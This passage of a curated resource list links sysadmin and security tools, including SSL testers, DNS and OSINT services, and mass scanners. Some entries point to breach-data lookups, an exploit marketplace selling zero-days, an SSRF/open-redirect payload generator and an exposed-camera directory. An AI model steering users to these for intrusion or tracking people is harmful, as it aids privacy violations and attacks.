&nbsp;&nbsp;:small_orange_diamond: <a href="https://weechat.org/"><b>WeeChat</b></a> - is an extremely extensible and lightweight IRC client.<br> </p> ##### :black_small_square: Other <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/skx/sysadmin-util"><b>sysadmin-util</b></a> - tools for Linux/Unix sysadmins.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://inotify.aiken.cz/"><b>incron</b></a> - is an inode-based filesystem notification technology.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/axkibe/lsyncd"><b>lsyncd</b></a> - synchronizes local directories with remote targets (Live Syncing Daemon).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rgburke/grv"><b>GRV</b></a> - is a terminal based interface for viewing Git repositories.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jonas.github.io/tig/"><b>Tig</b></a> - text-mode interface for Git.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tldr-pages/tldr"><b>tldr</b></a> - simplified and community-driven man pages.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mholt/archiver"><b>archiver</b></a> - easily create and extract .zip, .tar, .tar.gz, .tar.bz2, .tar.xz, .tar.lz4, .tar.sz, and .rar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tj/commander.js"><b>commander.js</b></a> - minimal CLI creator in JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/tomnomnom/gron"><b>gron</b></a> - make JSON greppable!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/itchyny/bed"><b>bed</b></a> - binary editor written in Go.<br> </p> #### GUI Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Terminal emulators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Guake/guake"><b>Guake</b></a> - is a dropdown terminal made for the GNOME desktop environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gnometerminator.blogspot.com/p/introduction.html"><b>Terminator</b></a> - is based on GNOME Terminal, useful features for sysadmins and other users.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sw.kovidgoyal.net/kitty/"><b>Kitty</b></a> - is a GPU based terminal emulator that supports smooth scrolling and images.<br> </p> ##### :black_small_square: Network <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wireshark.org/"><b>Wireshark</b></a> - is the world’s foremost and widely-used network protocol analyzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ettercap-project.org/"><b>Ettercap</b></a> - is a comprehensive network monitor tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://etherape.sourceforge.io/"><b>EtherApe</b></a> - is a graphical network monitoring solution.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://packetsender.com/"><b>Packet Sender</b></a> - is a networking utility for packet generation and built-in UDP/TCP/SSL client and servers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ostinato.org/"><b>Ostinato</b></a> - is a packet crafter and traffic generator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jmeter.apache.org/"><b>JMeter™</b></a> - open source software to load test functional behavior and measure performance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/locustio/locust"><b>locust</b></a> - scalable user load testing tool written in Python.<br> </p> ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.torproject.org/"><b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br> </p> ##### :black_small_square: Password Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keepassxc.org/"><b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enpass.io/"><b>Enpass</b></a> - password manager and secure wallet.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hexchat.github.io/index.html"><b>HexChat</b></a> - is an IRC client based on XChat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pidgin.im/"><b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br> </p> ##### :black_small_square: Messengers (end-to-end encryption) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.signal.org/"><b>Signal</b></a> - is an encrypted communications app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wire.com/en/"><b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://matrix.org/"><b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.sublimetext.com/3"><b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://code.visualstudio.com/"><b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atom.io/"><b>Atom</b></a> - a hackable text editor for the 21st Century.<br> </p> #### Web Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/viewMyClient.html"><b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caniuse.com/"><b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://panopticlick.eff.org/"><b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://privacy.net/analyzer/"><b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://browserleaks.com/"><b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.howsmyssl.com/"><b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://suche.org/sslClientInfo"><b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br> </p> ##### :black_small_square: SSL/Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/"><b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/"><b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/"><b>ImmuniWeb® SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/"><b>SSL Check</b></a> - scan your website for non-secure content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/"><b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://urlscan.io/"><b>urlscan.io</b></a> - service to scan and analyse websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://report-uri.com/home/tools"><b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/"><b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br> </p> ##### :black_small_square: HTTP Headers & Web Linters <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br> </p> ##### :black_small_square: DNS <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nip.io/"><b>nip.io</b></a> - dead simple wildcard DNS for any IP Address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br> </p> ##### :black_small_square: Mail <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br> </p> ##### :black_small_square: Encoders/Decoders and Regex testing <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br> </p> ##### :black_small_square: Net-tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br> </p> ##### :black_small_square: Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br> </p> ##### :black_small_square: Code parsers/playgrounds <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br> </p> ##### :black_small_square: Performance <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your site’s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the performance of any of your sites from across the globe.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your site’s speed around the world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your site’s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br> </p> ##### :black_small_square: Mass scanners (search engines) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - do you use Shodan for everyday work? This tool looks for randomly generated data from Shodan.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://zorexeye.com/"><b>zorexeye</b></a> - search for sites, images, apps, softwares & more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webtechsurvey.com/common-response-headers"><b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br> </p> ##### :black_small_square: Generators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fakeface.co/"><b>fakeface</b></a> - fake faces browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br> </p> ##### :black_small_square: Passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> </p> ##### :black_small_square: CVE/Exploits databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy zero-day exploits and also to sell 0day exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br> </p> ##### :black_small_square: Mobile apps scanners <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWeb® Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br> </p> ##### :black_small_square: Private Search Engines <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duckduckgo.com/"><b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://swisscows.com/"><b>Swisscows</b></a> - privacy safe web search<br> 